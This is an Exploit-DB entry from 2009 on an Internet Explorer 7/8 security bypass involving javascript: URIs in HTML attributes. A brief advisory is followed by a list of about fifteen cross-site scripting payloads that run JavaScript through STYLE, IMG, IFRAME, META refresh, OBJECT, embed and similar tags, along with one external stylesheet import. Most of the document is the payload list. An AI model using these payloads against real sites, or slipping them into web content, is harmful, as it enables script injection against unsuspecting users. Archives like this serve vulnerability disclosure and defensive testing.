Microsoft Internet Explorer 7/8 HTML Attribute JavaScript URI Security Bypass Vulnerability

2009-05-22T00:00:00
ID EDB-ID:33050
Type exploitdb
Reporter 80vul
Modified 2009-05-22T00:00:00

Description

Microsoft Internet Explorer 7/8 HTML Attribute JavaScript URI Security Bypass Vulnerability. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/35455/info

Microsoft Internet Explorer is prone to a security-bypass vulnerability because it fails to properly enforce restrictions on script behavior.

An attacker may exploit this issue to bypass restrictions on the execution of JavaScript code. This may aid in further attacks. 

<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://example.com/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html>